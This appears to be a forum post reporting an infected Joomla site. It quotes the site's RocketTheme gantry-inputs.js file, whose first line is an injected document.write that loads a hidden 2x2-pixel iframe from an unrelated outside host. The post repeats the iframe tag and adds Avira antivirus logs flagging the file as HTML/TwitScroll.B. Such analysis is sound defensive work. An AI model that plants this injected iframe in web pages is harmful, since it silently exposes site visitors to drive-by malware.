http://www.avinno.com/index.php?option=com_content

fireold

1. document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thecardoctorsales.co.uk/aeef.html?j=654535></iframe>');
   
2. 
   
3. /**
   
4. * [url=home.php?mod=space&uid=570682]@version[/url]   3.1.18 October 30, 2011
   
5. * [url=home.php?mod=space&uid=321866]@author[/url]    RocketTheme http://www.rockettheme.com
   
6. * @copyright Copyright (C) 2007 - 2011 RocketTheme, LLC
   
7. * @license   http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 only
   
8. */
   
9. 
   
10. var InputsExclusion = ['.content_vote'];
    
11. 
    
12. eval(function(p, a, c, k, e, r) {
    
13.     e = function(c) {
    
14.         return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    
15.     };
    
16.     if (!''.replace(/^/, String)) {
    
17.         while (c--) r[e(c)] = k[c] || e(c);
    
18.         k = [function(e) {
    
19.             return r[e]
    
20.         }];
    
21.         e = function() {
    
22.             return '\\w+'
    
23.         };
    
24.         c = 1
    
25.     };
    
26.     while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    
27.     return p
    
28. }('8 M=[\'.1j\'];8 2={1h:1.7,17:6(){2.v=$(1d.1c).1e(\'1b\')==\'v\';2.m=1f 1g({\'O\':[]});8 b=$$(\'x[y=U]\');8 c=$$(M.11(\' x[y=U], \')+\' x[y=U]\');c.C(6(a){b=b.Y(a)});b.C(6(a,i){2.B(\'m\',\'O\',a);0(2.m.13(a.j))2.B(\'m\',a.j,a);9 2.m.R(a.j,[a]);2.Q(a,\'15\').s(a,\'15\')});b=$$(\'x[y=N]\');c=$$(M.11(\' x[y=N], \')+\' x[y=N]\');c.C(6(a){b=b.Y(a)});b.C(6(a,i){2.B(\'m\',\'O\',a);0(2.m.13(a.j))2.B(\'m\',a.j,a);9 2.m.R(a.j,[a]);2.Q(a,\'I\').s(a,\'I\')})},Q:6(a,b){8 c=a.r(),3=a.t(),j=a.j.Z(\'[\',\'\').Z(\']\',\'\');0(c&&c.o()==\'p\'){a.F({\'E\':\'G\',\'L\':\'-D\'});0(2.v&&4.10)a.F({\'E\':\'G\',\'16\':\'-D\'});9 a.F({\'E\':\'G\',\'L\':\'-D\'});0(2.v&&(4.k||4.w)){a.S(\'T\',\'V\')}0(4.1k)a.S(\'T\',\'V\');c.q(\'l\'+b+\' l\'+j);0(a.5)c.q(\'l\'+b+\'-u\')}9 0(3&&3.o()==\'p\'){0(2.v&&4.10)a.F({\'E\':\'G\',\'16\':\'-D\'});9 a.F({\'E\':\'G\',\'L\':\'-D\'});0(2.v&&(4.k||4.w)){a.S(\'T\',\'V\')}3.q(\'l\'+b+\' l\'+j);0(a.5)3.q(\'l\'+b+\'-u\')}K 2},s:6(a,b){a.s(\'z\',6(){0(4.k||4.w){0(a.k){2.W(a,b)}a.k=(b==\'I\')?A:J}9 2.W(a,b)});0(4.k||4.w||(a.r()&&!a.r().12(\'X\'))){8 c=a.r(),3=a.t();0(c&&c.o()==\'p\'&&(4.w||(4.k&&!a.k))){c.s(\'z\',6(){0((4.k||4.w)&&!a.k)a.k=J;a.14(\'z\')})}9 0(3&&3.o()==\'p\'||(a.t()&&!a.t().12(\'X\'))){3.s(\'z\',6(){a.14(\'z\')})}}K 2},W:6(d,e){0(e==\'I\'){8 f=d.r(),3=d.t(),n="l"+e+"-u";8 g=((f)?f.o()==\'p\':A);8 h=((3)?3.o()==\'p\':A);0(g||h){0(g){0(f.H(n)&&g){f.P(n);0(d.5)d.5=A}9 0(!f.H(n)&&g){f.q(n);0(!d.5)d.5=J}}9 0(h){0(3.H(n)&&h){3.P(n);0(d.5)d.5=A}9 0(!3.H(n)&&h){3.q(n);0(!d.5)d.5=J}}}}9{2.m.19(d.j).C(6(a){8 b=a.r(),3=a.t();8 c=d.r(),1a=d.t();$$(b,3).P(\'l\'+e+\'-u\');0(b&&b.o()==\'p\'&&c==b){a.18(\'5\',\'5\');b.q(\'l\'+e+\'-u\')}9 0(3&&3.o()==\'p\'&&1a==3){3.q(\'l\'+e+\'-u\');a.18(\'5\',\'5\')}})}},B:6(a,b,c){8 d=2[a].19(b);d.1i(c);K 2[a].R(b,d)}};4.s(\'1l\',2.17);', 62, 84, 'if||InputsMorph|parent|window|checked|function||var|else||||||||||name|opera|rok|list|cls|getTag|label|addClass|getNext|addEvent|getParent|active|rtl|ie|input|type|click|false|setArray|each|10000px|position|setStyles|absolute|hasClass|checks|true|return|left|InputsExclusion|checkbox|all|removeClass|morph|set|setStyle|display|radio|none|switchReplacement|for|remove|replace|gecko|join|getProperty|hasKey|fireEvent|radios|right|init|setProperty|get|radioparent|direction|body|document|getStyle|new|Hash|version|push|content_vote|ie7|domready'.split('|'), 0, {}))

复制代码

1. <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
   
2. width=2 src=http://thecardoctorsales.co.uk/aeef.html?j=654535>
   
3. </iframe>

复制代码

Avira

2013/7/18 下午 07:53 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\95TAM12D\gantry-inputs[1].js'
      包含病毒或有害的程式 'HTML/TwitScroll.B' [virus]
      已採取動作：
      檔案會移動至 '547377eb.qua' 名稱底下的隔離區目錄。.

2013/7/18 下午 07:53 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        765
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/7/18 下午 07:53 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\95TAM12D\gantry-inputs[1].js 中
      偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
      執行的動作：傳輸至掃描程式

2013/7/18 下午 07:53 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\95TAM12D\gantry-inputs[1].js 中
      偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
      執行的動作：拒絕存取

2013/7/18 下午 07:53 [Web Protection] 發現惡意程式碼
      從 URL "http://www.avinno.com/components/com_gantry/js/gantry-inputs.js" 存取資料時，
      發現病毒或有害的程式 'HTML/TwitScroll.B' [virus]。
      已採取動作：已略過